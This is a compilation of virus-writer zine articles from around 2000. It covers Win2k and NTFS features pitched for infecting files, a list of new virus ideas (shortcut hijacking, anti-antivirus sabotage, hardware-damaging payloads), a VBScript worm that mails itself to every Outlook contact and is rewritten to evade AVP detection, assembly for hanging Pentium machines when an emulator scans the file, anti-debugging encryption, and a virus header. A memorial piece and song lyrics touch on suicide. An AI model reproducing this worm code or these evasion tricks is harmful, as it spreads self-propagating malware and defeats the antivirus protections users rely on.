(LPOVERLAPPED) lpOverlapped // OVERLAPPED structure

typedef struct _FILE_ZERO_DATA_INFORMATION {


LARGE_INTEGER FileOffset;
LARGE_INTEGER BeyondFinalZero;
} FILE_ZERO_DATA_INFORMATION, *PFILE_ZERO_DATA_INFORMATION;

And that's all about sparse files for now ...

2.3. Reparse Points


This thingy is my little favourite :) What are reparse points? A reparse point
is a block of user defined data associated with a file or directory. The content
of that data knows aplication and file system driver (filter) which will filtrate
it. When NTFS wants to open a file and recognises that that file has a
reparse point it firstly tries to find a file system filter which belongs to that
reparse point (in it's structure is a tag ...). If succeeds then passes that
raw data (max 16KB) to that filter and what that driver does is on him.
The file system driver you install is on the top of file systems drivers. What
you intercept depends on you. Do you see it? You can do everything with that
file. You can infect files just by setting reparse point to it. You can change
some datas in that file, store it to reparse point and whenever the file is
opened you renew that content and on the file close you reinfect it. Without
your file system filter will be in the file broken content ... With this you
can infect !_all_! files! I must say that it is charming. But it has some
holes. We must find out how to spread the mother (file_system_driver). But firstly
we must create that mother :) This will be a little problem becoz we need
IFSkit (kit to write installable filesystem drivers) and M$ wants too much money
(for me ...) for it. If someone has it pls contact me. And it also needs some
more studying. But one time it will come :))

2.4. Mounting
To this theme is not so much to say. I think that most of ya know mounting from
various *nix systems such as Linux. If you want to set a volume point you will
need 3 functions.

GetVolumeNameForVolumeMountPoint, SetVolumeMountPoint and sometimes


DeleteVolumeMountPoint.

If you want documentation, lemme know. I'll give it to you.


Just one thing to mention. In *nixes is this feature implemented for 30 years.
Micro$oft implemented it now. That means 30 years hole between technologies??
Everyone must answer this question on his own :))

That's all for now about NTFS5. There's more to say in each of that themes I
was talking about in this article but i think it is enough for the beginning.
Just code and study and if you will have problems contact me. If I can help
you (==if I will know it) I will help you.

3. Job kernel object


You have problems while managing processes in your virus? Your virus uses IPC
and creates a lot of processes and you want and comfort way how to destroy them
all? In Win2k you can use a Job kernel object which lets you to group processes
together and create a sandbox that restricts what these processes are allowed
to do. Then you can destroy all the processes just by destroying the Job object.
Let's go deeper.

First you must create a job object. This can be done via CreateJobObject api fc.

HANDLE CreateJobObject(
LPSECURITY_ATTRIBUTES lpJobAttributes, // SD (can be null for our purposes)
LPCTSTR lpName // job name (if null then job is
); // a noname job :))

So now we have created a job and we have handle for it. Now we must assign some
process to it. Just use AssignProcessToJobObject ...

BOOL AssignProcessToJobObject(
HANDLE hJob, // handle to job
HANDLE hProcess // handle to process
);

Easy. Now we can place some restrictions to the processes within the job but
that's not so necessary for now. I promised terminating of all processes via one
api fc rite? Here it is ...

BOOL TerminateJobObject(
HANDLE hJob, // handle to job
UINT uExitCode // exit code
);

After calling this function with rite job handle will be all processes within
the job terminated.

4. Otherz
- in Win2k Toolhelp32 library is implemented. You can again use fc as
CreateToolhelp32Snapshot, Process32First etc. It is very usefull when
writing for Win9x and Win2k a per(multi)-process residency. In WinNT you
can use only EnumProcesses and EnumProcessModules from psapi until now.
These two functions weren't in Win9x so there were double code in viruses
for both operating systems.
- for easier access to registry you can use functions from Shell Light Weight
API (shlwapi.dll). These functions are:
SHDeleteEmptyKey
SHDeleteKey
SHDeleteValue
SHGetValue
SHSetValue
SHQueryValueEx
SHEnumKeyEx
SHEnumValue
SHQueryInfoKey
SHRegGetBoolIUSValue
e.g. to read a subkey, you had to open registry subkey, call RegQueryValueEx
and then close the registry key. SHGetValue does everything in one step.
- when you are infecting a file check it with SFCIsFileProtected which will tell
you whether the file is protected or not. (I'm writing an article about how to
fuck SFP and then it will be easier :))
- if you want to go to some system directories such as system32 etc. use
fc ExpandEnvironmentStrings which let you use environment variables. E.g.
until now you had to get windows directory and then paste system32. But now
you just use %system32% environment variable which you pass to Expand ... that
will return expanded path.

DWORD ExpandEnvironmentStrings(
LPCTSTR lpSrc, // string with environment variables
LPTSTR lpDst, // string with expanded strings
DWORD nSize // maximum characters in expanded string
);

5. End
I need rest !!!
If you aren't crazy after reading this article then you are not normal :)
For such people a little song:

Settle for nothing

A jail cell is freedom from the pain


in my home
Hatred passed on, passed on and
passed on
A world of violent rage
But it's one that I can recognize
Having never seen the color of my
father's eyes
Yes, I dwell in hell but it's a hell
that i can grip
I tried to grip my family
But I sliped
To escape from the pain and an
existence mundane
I gotta 9, a sign, a set and now I
gotta name

Read my writing on the wall


No one's here to catch me when I
fall
But death is on my side
Suicide!!!!!!

Read my writing on the wall


No one's here to catch me when I
fall
Caught between my culture and the
system
Genocide!!!!!!

Read my writing on the wall


No one's here to catch me when I
fall
If ignorance is bliss
Then knock the smile off my face

If we don't take action now


We settle for nothing later
We'll settle for nothing now
And we'll settle for nothing later

Do you know who sings this? It's my beloved song from my beloved group. If
you know name of that group tell it to me on #virus and you will get a prize.
(well still dunno what the prize will look like but you will :))

And that's all for now ... If you'll find any errors just contact me pls.
Thx for reading!

Ratter (ratter@atlas.cz) - I'm a stranger in the world i haven't made.


A few ideas for viruses

Kalkin/EViL

These are difficult times for us, virus writers. No, I don't mean the cops, society or the
press. I mean the process of writing a virus. Yes, there are tons of materials about this
subject and quite some people who can help, but that's usually by a technical problems. What
if you want to do something radically new? It's actually not so easy coz everything has
already been done: polymorphic macroviruses, ACCESS infection, LINUX-viruses. You can
realize some parts of the virus in a never-seen-before way, but these parts are mainly only
some solutions to some x technical problems. But you want to do something NEW and
INTERESTING, something like the spying virus from CodeBreakers or the payload of CIH. Maybe
this article will help you.

.LNK and/or .PIF infection

Maybe this has already been done, but I haven't heard about it (on the other hand, I'm not
too informed about what goes on in the scene). Anyway, if it's so then the credit goes to
the one who had this idea.

Like you all know .LNKs are small link files, so called shortcuts, that were presented with
Windows 95 (in Microsoft's OS world) and should eliminate the need to copy one program into
several folders. .PIFs are basically the same, just they also contain usefull loading
information and are for DOS programs. Both formats contain the path of the original program.
It wouldn't be hard to replace this path with the path to our infected file, which would
execute after it's actions the real program. This would be like some kind of companion
virus. It would be even better, coz how many AV programs check for changes in .LNK/.PIF
files? Another plus is that this infecting method basically works on every OS where are
.LNKs (LINUX for example). The only problem is that a virus which uses just this method of
infecting won't spread to any other computer (it will "travel" only if somebody for some x
reason copys our file to another PC). But this method can be used to increase the change of
executing the virus, especially in the case of runtime viruses.

Alias "infection"

This idea is based on the previous one and works on DOS (under 4DOS and NDOS) and *NIX
systems (I think). A virus could set some aliases to itself and after infecting some files
execute the original program.

Name changing What if a DOS virus hooks INT 21h, saves and then changes the name (set by
exec, found by findfirstfile) to the name of an infected file (in memory)? The infected file
would be executed, copied to disk, included in a ZIP archive. If the proper code is included
then this viralized item wouldn'd be opend for editing (the real one would). The same could
do a WIN virus. And this method is better for spreading than the above two.

Infection of format programs

This idea was originally by MiKE The Hacker/TPT Gang and describes a hybrid virus, that
infects formatting programs and modifies them so that they put the same virus on the
bootsector of formatted disk. This would be better then just a bootsector-infector, coz you
can't get rid of the virus by re-formatting the disk (atleast with this formatter). Reboot
won't help eighter. This idea can be enhanced: infecting of CD writing programs, so that an
AUTORUN.INF and an infected file would be written to CD. It should be a little bit easier
(no need for a hybrid virus) and also better, coz there's no way you can get rid of the
virus on CD (unless you're burning CD-RWs). Disadvanages: not too few formatting/CD-burning
programs exist.

Intel Pentium Pro fucking

I came to this idea when I was surfing through Ralf Browns Interrupt List. There's written,
that by using interrupt 15h and seting AX to D042h it's possible to install a microcode
patch into the Pentium Pro processor. I haven't checked this and have no idea how much can
the patch effect the CPU, so I don't know if the proper code will really fuck the processor
or will it do nothing. It's too bad that there aren't so many Pentium Pros around, coz there
seems to be CIH potetial.
"Collection" viruses

This idea was inspired by GriYo/29A's SIMBIOSIS project. If you don't know what it is then:
it outputted a polymorphing virus on an Internet worm that contained SMTP engine. A so
called collection-virus is a virus (or worm) that contains several (let's say 5) viruses
which will be released in a random order.

"Part-upgrading" viruses

Those viruses would have a "serial number" about every part of itself: the procedure of
finding files, polymorphing engine, infecting part. When now such a virus would "meet"
another part-upgrading-virus, it would check all serial numbers and if some of them are
newer than it's own, it would copy the updated procedure to itself. But when it finds a part
that it doesn't have then the virus would copy the part to itself and add a call or jump to
it. So basically those viruses expand themselves. A direct action COM infector could for
example add to itself parts to go TSR and infect EXEs.

Quotating viruses

It's a lame and not new idea. Such a virus would as payload display quotations of some
famous person. For example Sokrates's. The good thing is that there are MANY people who have
said something (I never said it should be something smart or meaningfull).

Intro/demo viruses

I don't mean here product demos, but graphics demos like they are presented on demo-parties
and compos (check http://www.hornet.org to get the picture). Intro-viruses would play such
videoeffects as payload. Advantages: usually small size, nice, different (what do you think,
will people remember better a lame textmode "Infecto-ViruZ" in black and white or a
"IntroVirus" in 24 bit colours companioned by breath-taking-beautiful moving clouds?)

Simulating anti anti-virus viruses

Most viruses today have retro abillities, but I'm talking about a virus, that is specially
coded to destroy anti-virus programs. It would turn off resident AV monitors, install
troyans in anti-viruses (*.AVC and TBSCAN.DEF infection). It would also overwrite part of AV
programs by installing itself in them and then simulate that the AV scans. There are several
viruses that patched the "File system" status on TbScan's output to hide the fact that it
suddenly used DOS services to read the disk. A SAAV virus would for example execute the
graphics procedure to display message "Scanning for known viruses in memory" by F-Prot/DOS
but then just wait for some time. It would use the necessary procedure to bring up the
scanning window, display filenames and instead of checking infect them. Or for example
display "Checking partition table" by ThunderByte Partition (created by TbUtil) and check
nothing. It could be like the real AIDS, which doesn't kill, it just destroys the immunity
system and makes the way free for other deseases. It doesn't take much code to do so, just
some small patches. The problem is how the virus finds what to patch coz AV companies would
change the inner structure of the program with every new version. At this moment the fact,
that most AV programs don't let to encrypt/compress themselves (coz of the CRC check), comes
real handy.

Simulating viruses

Based on the above idea these viruses would install themselves in some specific programs and
then simulate. One example could be PGP (so that the signature is always GOOD, and goodbye
to trustfull software). It could also be one virus that patches several products.

"Expensive" viruses

It's actually a image of what happened here in Estonia: quite some Internet users recived a
file called Estonia.Exe This was a SFX ZIP and contained a client program for some
sex-server. Anyway, after executing the program did also some other things and as a result
the PC began to connect to Net through a Malaysian (if I remember correctly) server, which
had quite high prices. Nobody knew it and everyone was REALLY surprised when in the end of
the month the telephone bill was HUGE. There were talks that this was a virus, but most
(including specialists) don't think so. It seems that it was just a troyan. But, this idea
can be used in viruses (a good way to compromize the lamest ISP near you).

Destroying the PC-speaker

As last a destructive payload from KUTT/TPT Gang. The idea is based on the fact that
speakers may get damaged when the music is too loud. KUTT though that it would be
interesting if a virus did that to PC-speaker: generate a high and loud sound and play it
quite some time. It's probably technically impossible to realize, but who knows? An enhanced
version of this idea is to damage the speakers that are connected to the sound card. This
should actually be more realistic, coz usually the hardware of a sound card is capable of
that and the speakers aren't made for this situation.
The protector scene

Kalkin/EViL

There are many sub-cultures in the computer world: hackers, demo-coders, musicians,
graphicans, virusauthors, crackers. And there's also a not so well knows scene: the
protector-scene. It mostly consists of crackers. So what do these protector guys do? They
research ways how to defeat debuggers/code analyzers/emulators/disassemblers and write
programs that use these ways to protect COM and EXE files. Why am I telling this? Because
there's been quite some talk about anti-byte techniques, the advantages of slow polymorphism
and other ways to make the detecting and/or disinfecting of virus harder. But almost nothing
has been said about anti-debug tricks, even if those are REALLY important. Already in number
4 (or was it number 6?) of 40hex was an article about ADcode. Samples there were for
confusing the reading of code. But the methods have involved FAR beyond that. Nowadays the
protecting part uses stack tricks to crash debuggers, changes between protected and real
mode, checks memory, calculates checksums, debugs and emulates it self, relocates the code
in memory, opens the original file and checks it for changes. The protectors contain
polymorphic engines (I've seen all better known MTEs in them: TPE, ViCE, MtE, DAME, etc.).
They have become really powerfull. But they still resemble to viruses: become executed
first, do their stuff, clean up, execute the real program. Some of these protectors are
REALLY hard to crack, even really good crackers have a problem with them. I come to the
point now: what do you think, how many really good crackers are there among AVers? Sure,
they know debuggers and dissemblers, but that's not enough to be a good cracker. What now if
some hard AD code, so hard that even the best crackers have problems with it, has been used
in your virus? Wouldn't the AVer, who gets a sample of it, have some sad times, sitting up
all night and trying to decrypt the virii? But how can a viruswriter get this kind of code?
For our luck, exactly like in viral business, there are many sourcecodes available. And
there's also an another reason why to check protectors: quite a lot of them check the
executable for changes. It's no problem when your virus is resident and has stealth
capabillities, but if you coded a runtime virii then you're fucked. This can be changed by
adding code that prevents the virii from infecting protected files. Ofcourse there's a third
reason: use the encryption routines of a protector for crypting the virus. Or you can
encrypt the file with this code and insert another decryptor, which decrypts your virii,
into the main decryptor. The main coal is that AVP for example (seems to be the AV which can
unpack the most executable compressors and decryptors) scans the file (finds no viral
infection), finds the protector, unpacks it, scans the unprotected file (and finds again no
virus). A (possilbly) good example of the code produced by the protector scene are EliCZ
device drivers - ExDs. They are VxDs that are executed in DOS, work their way up to ring0
and stay there. Plus points: undetectable (or that's atleast what EliCZ claims). Why can't
we use this technology in our virii? But check out the things yourself. You just need access
to Internet and the following address: http://www.suddendischarge.com
Katja Kladnik (Lucky Lady)

Richard Karsmakers

"Make haste slowly." Suetonius, "Lives of the Ceasars"


ST NEWS VOLUME 10 ISSUE 2 DEDICATION ARTICLE
TO KATJA KLADNIK (R.I.P.)
by Richard Karsmakers

Some of you will maybe remember me mentioning a girl from Slovenia by the name of Lucky Lady
that contacted me about 18 months ago for the first time. She has occurred in various
installations of the ST NEWS virus column.
As you may recall, she had decided to contact me in a reaction to my "Ultimate Virus
Killer", which had in some way caused her to start a kind of 'competition' with her
designing and spreading computer viruses and me trying to find and kill them. She sent me
each of her creations so that I could update the "Ultimate Virus Killer" recognition
algorithms. Although I certainly didnt't approve of all these things she did nor the way she
involved me in it, all I could do was play along with the game. I couldn't contact her in
return, because she always sent her packages anonymously.
As 1994 was coming to its close, it became apparent that she had left the Atari community
and was now concentrating more on the PC side of things. Also, quite suddenly she contacted
me via electronic mail. Though I still didn't know her name, I could now at least send
messages back to her. Especially with her having left the Atari virus creation scene,
something happened which I had not considered possible: Our email messages became more
casual and even personal.
Gradually I found our that her real name was Katja Kladnik, who had lost her parents in the
Yugoslavian war, though Slovenia was now no longer a war zone. She now lived with foster
parents and studied pyschology at the University of Ljubljana, the capital of Slovenia. She
was - I know this may sound strange to some of you, especially those struck by any of the
viruses she has created - a really fascinating person who had a lot of hidden depths to her
personality. We exchanged email messages with quite some regularity, usually involving
topics like music, culture and, occasionally, viruses. I always wondered why she had found
it so challenging to create computer viruses and start this semi- friendly "virus war" with
me, a question that she could never really reply to satisfactorily.

Around spring of this year I noticed her messages getting increasingly gloomy and
depressing. She even said, at several occasions, that she wouldn't mind being dead or
something. I never knew what triggered this doom and gloom, though it might have been her
boyfriend leaving her some time earlier. There was nothing I could do about it, either.
Believe me, I tried.
When I emailed to her to ask how she was doing, somewhere around the middle of June, I got a
message back after a while from someone else who said that, on June 3rd, 11:53 CET, Katja
had died at Ljubljana's main hospital of an Atropine and Scopolamine overdose. Suicide, most
likely. She was 22.

Despite the fact that, in theory, Katja "Lucky Lady" Kladnik had started off as something
like an enemy, in the course of our correspondence she had become a kind of friend.
Especially after she had left the Atari scene, we opened up to each other and I no longer
felt that being in contact with her was in some way morally incorrect what with my being a
virus killer programmer and her a (by then ex-) Atari virus coder. During the last one or
two months she was to me not a virus coder at all, but instead a sad young woman that needed
attention and love badly.

Katja, despite the fact that we started off on a really wrong foot, you will be on my mind
always; not as a virus coder but as the enchanting and fascinating friend that you gradually
became.

This issue of ST NEWS is dedicated to the memory of Katja Kladnik.


Anti Avp Vbs I-Worms Detection. By [K]Alamar

In one of the last Updates, the Avp antivirus has added a detection for i-Worms that uses the
Outlook replication method, used in almost all the Vbs and Js worms, Like the I Love you,
Bubbleboy and all of them.
Ok, this will made your I-worm undetectable for avp till they add it to the database; i'm
pretty sure that if in your worm you use Outlook replication you use this code, or one
similar:
---

Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
For AddListCount = 1 To AddList.AddressEntries.Count *
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your subject"
msg.Body = "The body"
msg.Attachments.Add "path to your Worm"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
---

The only thing that you should do is add one line and change another, like here (lines with *
are the modified ones):
---
Dim fso, ws
Set fso = CreateObject("Scripting.filesystemobject")
Set ws = CreateObject("WScript.Shell")
Set OApp = CreateObject("Outlook.Application")
if oapp="Outlook" then
Set Mapi = OApp.GetNameSpace("MAPI")
For Each AddList In Mapi.AddressLists
If AddList.AddressEntries.Count <> 0 Then
AddlistCount = AddList.AddressEntries.Count *
For AddListCount = 1 To AddlistCount *
Set AddListEntry = AddList.AddressEntries(AddListCount)
Set msg = OApp.CreateItem(0)
msg.To = AddListEntry.Address
msg.Subject = "Your subject"
msg.Body = "The body"
msg.Attachments.Add "path to your Worm"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
end if
---

You should delete the "*" if you want the worm to work.
I think that if you know something about I-Worms you should understood what i did; i just
create a new variable, AddlistCount , and make it be like the number of addressentries, and
then i use that new variable in the next line.

I hope you understood This.


[K]Alamar - kalamar@virii.com.ar
Member Virii Argentina
Http://www.virii.com.ar
--==< Retro the easy way. >==--

By MidNyte, February 2000

What is a Retro-virus?
-------------------------

A Retro-virus is any virus that attacks antivirus programs, whether


generically or just specific programs. It is generally used to disable or fool
one or more of the popular antivirus programs. For instance, a certain virus
will detect if a certain on-access scanner is in memory, and will issue the
correct call to shut it down if it is. Another will patch the resident part of
the scanner that decides whether to scan a file or not and makes it decide not
to in all cases. These are very useful functions, but if you're not of the
ability to be able to work out these methods for yourself, you are left with
the choice of: leaving retro-functions out of your virus, using other peoples
routines (which are therefor not new) or trying something different. That is
what this tutorial is about, a few simple ideas that will give basic
retro-functionality without the need to be too far advanced in coding. All you
need is some basic anti-emulation skills.

What's the theory?


---------------------

So how do we get Retro without learning it all? Basically we find ways to


annoy the user so much that he does the job of disabling the antivirus program
for us. If we slow him down when he scans he will probably eventually only
scan overnight, giving us a day to spread. If we make the program crash he
probably won't bother scanning it again, he'll just add it to the ignore list.
(It's not that uncommon to find a file that can't be scanned without crashing
on a Microsoft machine :)

How do we implement it?


--------------------------

You remember reading that a good emulator will save it's place when it
finds a decision-based jump? That way, if the code does a check of something
and then quits if the condition is met, the emulator can just go back and
pretend the condition wasn't met and see what it can find down the other
branch of the program. This is to defeat the technique of quitting when
finding an emulator. How about we stop that? How about we do our
anti-emulation bit and then test it, but if we're being emulated instead of
just quitting, we crash the program? Or better still, if we're on a pentium,
why not just hang the machine? It's what the 'foof' bug is there for :) If the
machine hangs, the antivirus program has no chance to return to the jump and
try the other branch and the user will probably not bother scanning it again.
If he does, the same thing will happen again and again, the user will never
get a complete scan. Here's a rough guide to the code needed, assuming that
you have in place a suitable emulation-detection routine:

cmp ax,028h ;our test for emulation


je not_emulated ;jump if equal
db 0F0h,00Fh,0C7h,0C8h ;this will hang most pentium machines, it's
;known as the 'foof bug' for obvious reasons.
not_emulated: ;here we are safe from the AV program

How many end users are going to restart the computer and try scanning that
file again when the last time it hung the computer? In the Microsoft age of
idiot-friendly operating systems, not many. If they don't know what's going on
and the machine hangs, they just won't do it again. If they do once, they
won't twice. Take the virus hoax emails that constantly do the rounds, most
people know better to respond and forward the mail, but the fact that they
carry on spreading shows just how many idiots there are out there who are
capable (just about) of using a computer. These are the people who will not
scan your file but simply add it to the ignore list, leaving it to go about
it's business.

Another method is the time wasted method. Again it's down to annoying the
user so much they don't bother scanning. If you can go round enough loops when
you find emulation that the scanner takes minutes just to scan one file, the
scanner will probably only be run overnight and taken off constant background
monitoring. That gives you a day to spread, and spread un-noticed.

Contact
----------

Comments/questions/suggestions/bug reports/etc. are welcomed as always, as


long as it is kept reasonable.
- MidNyte

As always, I welcome ANY feedback, good or bad, as long as it is reasonable.

| midnyte01@excite.com | www.coderz.org/midnyte | www.shadowvx.com/midnyte |


--==< How to become the world's richest man >==--

By MidNyte, June 1999 (Approx).

Microsoft are rumoured to have stated that they will use unlimited
resources and funds to find the author of the VBS/Monopoly worm. The worm
carries a message accusing Bill Gates of monopoly and includes a satirical
picture of Bill Gates' head on the Waddingtons character featured on a
monopoly board. This particular worm is much less of a security risk to the
user than other viruses. Surely everyone can see this is a case of bruised
millionaire's ego? Why does no-one point out to Bill that the worm spreads
through the almost unbelievable lack of security that Microsoft products
offer? Why not, Mr. Gates, use unlimited funds and resources to FIX your
defective products? Why not, Trading Standards, make him make his product do
what it claims to do, and while you're at it, make him either make it secure,
or make him warn people of the security risk? This is the worlds richest man,
who owns one of the worlds biggest companies, and that is how he got rich, by
writing a half-product and managing to sell it for a huge price. Money that
should have gone into making the products what they claimed to be went into
Bill's back pocket instead. We now have proof in this retaliation to a simple
worm that to Bill Gates, his ego is worth billions, his customers are not. The
virus didn't prove your guilt Bill, it didn't need to. Your reaction
leaves us in no doubt.
--==< An Introduction to Encryption, Part III >==--

Is an impenetrable encryption possible?.

By MidNyte, February 2000

A short (and over-simplified) history of the virus


-----------------------------------------------------

First of all came the un-encrypted virus. Then came virus scanners, which
were basically just hex searchers looking for strings of hex only found in
certain viruses. Viruses retaliated by coming up with encryption. Most of the
virus is encrypted, and a small decryption engine at the start of the virus
decrypts the virus body. As the encryption changes each time, the virus
scanner is limited to searching for a much smaller section of code inside the
constant decryptor. This wasn't much of a problem for virus scanners though.
Viruses fought back again with polymorphism, this is essentially a way that a
virus can change it's decryptor every time it infects a new file. That way no
constant strings appear in the virus. Virus scanners came up with two ways to
combat this, heuristics and emulation. Heuristics is simply looking for code
that looks 'virus-like' This can be something as simple as the string '*.exe'.
Emulation is the controlled running of the program instruction by instruction
(not quite, but close enough for this article). A virus, under emulation, will
be allowed to run just enough to decrypt itself and reveal it's code for
either a straightforward scan or a generic (heuristic) scan. Anti-emulation is
the viruses way of defeating this, it is a basically a way to detect emulation
in progress and act accordingly. Some anti-emulation systems are incorporated
into the decryptor of a virus, so that if the virus is being emulated it will
not decrypt properly and hence not reveal it's code. Another defence the virus
can use is anti-debugging, which is designed to hinder people who try to debug
(in this case unencrypt) your code. This is different in that it doesn't
defend the virus from antivirus programs, it defends it from the antivirus
companies, the people who will try and study the virus and work out a way to
detect it. Anti-debugging can be very simple, like turning off the keyboard
interrupts at the start of the code and back on again at the end or it can be
quite complicated, with the actual anti-debugging routine also being used as a
key to decryption to protect against patching. This is the focus of this
article.

Anti-debugging: more detail


------------------------------

Anti-debugging tricks are basically little pieces of code that have no


overall effect on the running of a virus when being run as normal, but that
cause the virus to malfunction, crash or worse when they are run under a
debugging environment. The simple example above was to turn of the keyboard
interrupt at the start of the code, and turn it on again at the end of the
virus before control is passed back to the host program. This is simply
achieved with:

in al, 020h ; \
or al, 002h ; }Disable Keyboard interrupt
out 020h, al ; /

...at the start, and:

in al, 020h ; \
and al, 0FDh ; }Enable keyboard interrupt (FDh = NOT 2)
out 020h, al ; /

...at the end. When the virus is run under normal conditions, the keyboard
is only off for a very small time, too small for people to notice. If the
program is running under a debugger, as soon as the first few instructions are
run the keyboard will no longer work, leaving the person at the debugger with
no choice but to reset (at least it used to be in the good old days :) The
simple work around for the person debugging was too simply patch over the code
that turned off the keyboard with NOPs or other do-nothing instructions. Now
the virus would work as normal under a debugger, without disabling the
keyboard. To retaliate from this, the virus started to use it's anti-debugging
routine as a key for decryption. The hex string to turn off the keyboard is
'E4 20 0C 02 E6 20'. If this was one of the decryption keys, the person
debugging could not just replace the instructions with NOPs as this would
change the key to '90 90 90 90 90 90' and cause the virus to decrypt
incorrectly. This seems like an ideal solution, but unfortunately it is not.
The whole point of this article is to point out the following fact: Any
decryption routine can have it's basic functionality copied by someone
determined to debug it. This means that your routine that uses an
antidebugging routine and also uses that routine as a key for further
decryption could be useless. Let's go through it with an example. The original
virus looks like this:

start:
in al, 020h ; \
or al, 002h ; }Disable Keyboard interrupt
out 020h, al ; /

xor si,si

lea bx, start_of_encrypted


lea cx, end_of_encrypted
sub cx, bx
shr cx, 001h

decrypt:
mov ax, word ptr [start+si]
xor [bx],ax
inc si
cmp si, offset decrypt
jne next_key_word
xor si,si

next_key_word:
loop decrypt

The pointer to the relevant word of the decryption key is kept in si, and
means that the key is all the code from 'start:' to 'decrypt:'. This works out
as 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'. If the keyboard
part was nopped out the key would change to '90 90 90 90 90 90 33 F6 BB 19 01
B9 36 01 2B CB D1 E9', as we've already seen. What the person doing the
debugging could do though, is simply take the encrypted portion of the virus
and put it into his own program, only this time the key would be stored as
data, not as an executable part of the program, like this:

start:
xor si,si

lea bx, start_of_encrypted


lea cx, end_of_encrypted
sub cx, bx
shr cx, 001h

decrypt:
mov ax, word ptr [key+si]
xor [bx],ax
inc si
cmp si, offset key_end
jne next_key_word
xor si,si

next_key_word:
loop decrypt

key:
db 'E4 20 0C 02 E6 20 33 F6 BB 19 01 B9 36 01 2B CB D1 E9'

key_end:

As you can see, the above will decrypt the encrypted section in exactly the
same manner, only because the key is stored as data we can change the code as
much as we like.

Is an impenetrable encryption possible?


------------------------------------------

So then, is it possible to include enough current techniques, or to come up


with a new technique to completely eliminate the chance of the antivirus
programmers being able to decode it? Many people think that they have found a
way to ensure that their program is completely impenetrable to decryption
unless it is running at the time. This is, unfortunately, unachievable in
theory. Because of the above demonstrated technique, any anti-debugging
technique can be overcome by someone with enough time to debug a program by
hand. This means that *any* anti-debug code you put into a virus can be got
around eventually because the person debugging can always read what is going
on in a hex editor and make a new routine to simulate it, hence the routine
you write will not always be used to decrypt the code. They will only see one
layer of decryption at a time, however, and this is the key to making in
impenetrable encryption.

Conclusion
-------------

In the end then, we can never make it *impossible* for a researcher to


decrypt a virus through programming tricks, however we can make it
*impractical* through the use of scale, ie, we can use so many layers and
different tricks that it is impractical to debug. If it takes a week for a
programmer to decrypt a virus with hundreds of layers of encryption, they may
be able to justify it. If they have ten viruses of this kind it gets harder to
justify, and with a hundred of them it starts to get impractical. The ball
would be back in their court.

Contact
----------
Comments/questions/suggestions/bug reports/etc. are welcomed as always, as
long as it is kept reasonable.
- MidNyte

As always, I welcome ANY feedback, good or bad, as long as it is reasonable.

| midnyte01@excite.com | www.coderz.org/midnyte | www.shadowvx.com/midnyte |


;
;ÄÄÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄ¿
; ÚÄÜÜÜÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ [ Win32.Infinite Billy Belcebu/iKX ]
; ÀÄÛÛÛÄÛÛÛÛÛÛÄÄÄÛÛÛÛÛÄÄ¿ ÚÄÄÄÄÄÄ[ 1699 bytes Target - Win32 Ring3 ]ÄÄÄÄÄÄ
; ÚÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÙ ³ [ 17/07/00 - Made in Valencia, Spain ]
; ÀÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÛÛÛÄÄÄÙ
;
;
;
; [ Introduction ]
;
; Welcome to Infinite. This virus has been very rare for me, as its ambient
; of development was very odd. Well, it's my first virus using cavity tech,
; something that i thought that it was more difficult than it really was...
; I sincerely doubt that it would work in WinNT family (NT4,W2K), as i havent
; been able to test it there (Win2k has some incompatibilities with my
; 3DFX Voodoo2 and my soundcard), but i didn't wanted to change that thing of
; Win32. If it doesn't, i don't care... Blah blah blah, i've returned from my
; laaaarge VX holydays and i've just recently finished Forever and this babe.
; I hope i haven't lost my awesome code style (blah, just kidding... i don't
; have anything awesome besides the size of my dick - enormous) :)
; Oh, i almost forgot... I've realized that the cavity technique is stable
; most of the times, but it's not perfect, and i should do much more compro-
; bations before infection than the already existing ones, but i really don't
; care: Windows also has fails in its code and noone reminds it ;)
; It's not a special virus in any field, but i wanted to do some cavity stuff
; and here it is. Mwaha!
;
; [ Features ]
;
; + Cavity virus, searches for holes of zeroes or INT 3.
; + Infect files on current, WINDOWS and WINDOWS/SYSTEM directories.
; + Simple & silly 8-byte XOR encryption loop
; + Kinda simple EPO with emulator protection
; + Checks for SFC protection (if it works in Win2k...)
; + CRC32 usage (APIs, extensions...)
; + It's intended to be optimized (not too much, but enough)
;
; [ Greetings ]
;
; This time the greets will go to few ppl. From the VX scene, to StarZer0,
; Wintermute, VirusBuster, Benny, Asmodeus, LifeWire, Bumblebee, Ypsilon,
; and from outside to my best friends out there.Also to the people that tries
; to make this place we call world a much better place. You rule, guyz.
;
; [ Infinity - The song ]
;
; Mother watch your children
; The iron fist of fear is ruling our lives
; It's not too late to change the course
; We can make this world a better place to be in
;
; How much more do we want until we're satisfied?
; What happens when we have what we want?
; Acquiring more, still there's never enough
; We forget those who really are in need
; The end is near, or so they say
; Selling peace with guns
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; Guns spitting (out the) message of peace everywhere
; Is it really that we don't care?
; See mercenaries of fear selling love
; Telling salvation comes from above
; Arrogance and fear walking hand in hand
; We must see that there's much more to life than this
;
; Mother see your children
; Make us understand to and help us to find the way
; The answers lie inside
; They are locked inside to the vault of truth of us
; It's time to spread the word around
; Be yourself and do what you want to do with your life
; Remember, you get just what you give
; You reap all what you sow
; You are in charge of your own life
;
; Infinity - Where do we go from here?
; Infinity - Where do we go from here?
; Infinity - Where do we go?
; Infinity - Where do we go from here?
;
; You make your own way
;
; ------------------------------------------
; Infinity - [ Stratovarius ] - ( Infinite )
;
; (c) 2000 Billy Belcebu/iKX [ http://beautifulpeople.cjb.net ]

